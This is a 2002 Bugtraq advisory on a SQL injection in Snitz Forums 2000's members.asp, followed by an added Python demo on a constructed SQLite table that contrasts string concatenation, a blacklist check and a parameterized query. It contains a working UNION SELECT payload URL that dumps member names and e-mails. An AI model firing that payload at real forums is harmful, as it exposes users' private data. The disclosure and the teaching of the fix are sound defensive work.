[25183] in bugtraq
Snitz Forums 2000 remote SQL query manipulation vulnerability
daemon@ATHENA.MIT.EDU (acemi)
Fri Apr 19 19:23:50 2002
Date: 19 Apr 2002 21:06:46 -0000
Message-ID: <20020419210646.23194.qmail@mail.securityfocus.com>
From: acemi <acemi_5@yahoo.com>
To: bugtraq@securityfocus.com
Vulnerable
----------
Product        : Snitz Forums 2000
Version        : 3.3, 3.3.01, 3.3.02, 3.3.03 (last stable version)
Object         : members.asp
Class          : Input validation error (remote SQL query manipulation vulnerability)
Vendor-URL     : http://forum.snitz.com/
Vendor-Status  : informed, not patched
Remote-Exploit : yes
Introduction
------------
Snitz Forums 2000 is open-source, ASP-based web forum software that
runs on Microsoft Windows operating systems. A vulnerability exists in
Snitz Forums 2000 that allows a malicious user to remotely manipulate
the logic of its SQL queries. As a result, it may be possible for an
attacker to view all data in the forum's database. The vulnerability
can be exploited with nothing more than a web browser.
More Details
------------
In the members.asp page, when members are listed by a search
criterion, the M_NAME input is not validated before being placed
into the SQL query. As a result, an attacker can append an extra
SELECT statement to the query with UNION and read any data in the
forum's database.
Proof-of-concept
----------------
Normally, to list the members whose member name starts with 'A',
members.asp is requested as follows:

/members.asp?mode=search&M_NAME=A&initial=1&method=
The following request demonstrates the vulnerability:
/members.asp?mode=search&M_NAME=XXXX%25')%20UNION%20SELECT%20MEMBER_ID,%20M_STATUS,%20M_NAME%20%2B%20'/'%20%2B%20M_EMAIL%20%2B%20'/',%20M_LEVEL,%20M_EMAIL,%20M_COUNTRY,%20M_HOMEPAGE,%20M_ICQ,%20M_YAHOO,%20M_AIM,%20M_TITLE,%20M_POSTS,%20M_LASTPOSTDATE,%20M_LASTHEREDATE,%20M_DATE,%20M_STATE%20FROM%20FORUM_MEMBERS%20WHERE%20(M_NAME%20LIKE%20'&initial=1&method=
In the resulting listing, the MEMBERNAME column shows
MEMBERNAME/EMAIL/ for every row.
Temporary fix
-------------
To fix this bug, in members.asp, change the following lines:
    SearchName = Request("M_NAME")
    if SearchName = "" then
        SearchName = Request.Form("M_NAME")
    end if
with:
    ' Only accept the search string if it contains none of the
    ' characters listed in sInvalidChars (see inc_functions.asp)
    if IsValidString(Request("M_NAME")) then
        SearchName = Request("M_NAME")
    end if
    if SearchName = "" then
        if IsValidString(Request.Form("M_NAME")) then
            SearchName = Request.Form("M_NAME")
        end if
    end if
and in the function IsValidString(sValidate) in inc_functions.asp,
change the following line:

    sInvalidChars = "!#$%^&*()=+{}[]|\;:/?>,<"

with (the only change is the single quote added at the end):

    sInvalidChars = "!#$%^&*()=+{}[]|\;:/?>,<'"
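The following is an added example, not code from the advisory or from Snitz Forums 2000. It reproduces, against a constructed in-memory SQLite table, the mechanism described under "More Details" and the two remedies a defender would compare: the advisory's temporary blacklist check (a Python rendering of the patched sInvalidChars) and a parameterized query. The table `FORUM_MEMBERS`, its reduced column set, the sample rows and the payload string are all constructed here; the payload keeps the shape of the advisory's URL but uses SQLite's `||` for string concatenation instead of the `+` used by the forum's database.

```python
import sqlite3

# Constructed stand-in for the forum's FORUM_MEMBERS table (reduced column set,
# not the real Snitz schema), so the example runs offline in memory.
SAMPLE_MEMBERS = [
    (1, "alice", "alice@example.invalid", 1),
    (2, "bob", "bob@example.invalid", 1),
    (3, "admin", "admin@example.invalid", 1),
]

# Constructed payload with the same shape as the advisory's URL, in SQLite syntax:
# close the LIKE literal, UNION in a SELECT that folds M_EMAIL into the name
# column, and let the query's own trailing "%')" complete the second WHERE.
UNION_PAYLOAD = ("XXXX%') UNION SELECT MEMBER_ID, M_NAME || '/' || M_EMAIL, M_STATUS "
                 "FROM FORUM_MEMBERS WHERE (M_NAME LIKE '")

# Python rendering of the advisory's patched sInvalidChars (single quote appended).
INVALID_CHARS = "!#$%^&*()=+{}[]|\\;:/?>,<'"


def make_db():
    """Create the in-memory table and load the constructed sample rows."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE FORUM_MEMBERS "
                "(MEMBER_ID INTEGER, M_NAME TEXT, M_EMAIL TEXT, M_STATUS INTEGER)")
    con.executemany("INSERT INTO FORUM_MEMBERS VALUES (?, ?, ?, ?)", SAMPLE_MEMBERS)
    return con


def is_valid_string(value):
    """Blacklist check in the spirit of IsValidString(): reject any listed character."""
    return not any(ch in INVALID_CHARS for ch in value)


def search_concatenated(con, search_name):
    """Legacy pattern from members.asp: the request value is spliced into the SQL
    text, so a quote in search_name changes the query's structure."""
    sql = ("SELECT MEMBER_ID, M_NAME, M_STATUS FROM FORUM_MEMBERS "
           "WHERE (M_NAME LIKE '" + search_name + "%')")
    return con.execute(sql).fetchall()


def search_filtered(con, search_name):
    """The advisory's temporary fix: refuse the search when the input fails the
    blacklist. Returns None to signal rejection (members.asp leaves SearchName empty)."""
    if not is_valid_string(search_name):
        return None
    return search_concatenated(con, search_name)


def search_parameterized(con, search_name):
    """Durable fix: bind the LIKE pattern as a parameter, so a quote is only data."""
    sql = "SELECT MEMBER_ID, M_NAME, M_STATUS FROM FORUM_MEMBERS WHERE (M_NAME LIKE ?)"
    return con.execute(sql, (search_name + "%",)).fetchall()


def leaked_emails(rows):
    """Name-column values that the UNION rewrote into 'name/email', i.e. disclosed data."""
    return [name for _, name, _ in rows if "/" in name and "@" in name]


if __name__ == "__main__":
    db = make_db()
    print("concatenated, benign input:", search_concatenated(db, "a"))
    print("concatenated, payload:     ", leaked_emails(search_concatenated(db, UNION_PAYLOAD)))
    print("filtered, payload:         ", search_filtered(db, UNION_PAYLOAD))
    print("parameterized, payload:    ", search_parameterized(db, UNION_PAYLOAD))
```

Run stand-alone, the concatenated query returns every member's e-mail address folded into the name column, exactly the MEMBERNAME/EMAIL/ effect the advisory describes; the blacklist check rejects the same input because it contains `'`, `(`, `)` and `%`; and the parameterized query treats the whole payload as a literal prefix and matches nothing. The blacklist stops this particular payload but must be kept in step with every character the database could interpret, whereas binding the value as a parameter removes the ambiguity between data and query text entirely.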